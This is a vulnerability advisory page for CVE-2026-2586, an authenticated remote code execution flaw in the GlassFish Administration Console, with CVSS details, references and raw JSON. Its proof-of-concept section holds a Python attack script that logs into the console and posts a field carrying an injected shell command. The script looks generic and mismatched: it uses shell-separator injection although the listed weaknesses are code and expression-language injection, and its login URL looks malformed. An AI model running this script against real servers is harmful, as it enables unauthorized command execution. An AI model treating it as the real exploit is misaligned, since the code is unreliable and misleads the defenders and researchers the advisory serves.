CVE-2026-2586

Description

An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish's Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user.

CVSS Details

CVSS Score

9.1

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

GlassFish Server (Open Source Edition)

GlassFish Server (Commercial Edition)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target configuration
target_url = "http://target-glassfish:4848/management/domain"
username = "admin"
password = "password"

# Malicious payload to execute OS command (e.g., creating a file)
payload = "; touch /tmp/pwned"

# Authenticate and exploit
session = requests.Session()
login_payload = {"j_username": username, "j_password": password, "loginForm": "Login"}
session.post(f"{target_url}/login", data=login_payload)

# Send crafted request to trigger RCE
exploit_headers = {"Content-Type": "application/json"}
exploit_data = {"name": payload}

response = session.post(target_url, json=exploit_data, headers=exploit_headers)

if response.status_code == 200:
    print("[+] Payload sent successfully.")
else:
    print("[-] Failed to send payload.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-2586
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-2586
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-2586/
[4] VulDB https://vuldb.com/cve/CVE-2026-2586
[5] https://gitlab.eclipse.org/security/cve-assignment/-/issues/87

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-2586", "sourceIdentifier": "[email protected]", "published": "2026-05-19T15:16:28.413", "lastModified": "2026-05-19T17:57:25.143", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "An authenticated Remote Code Execution (RCE) vulnerability was identified in GlassFish's Administration Console. A user with access to the panel can send crafted requests that allow the execution of arbitrary operating system commands with the privileges of the application service user."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-94"}, {"lang": "en", "value": "CWE-917"}]}], "references": [{"url": "https://gitlab.eclipse.org/security/cve-assignment/-/issues/87", "source": "[email protected]"}]}}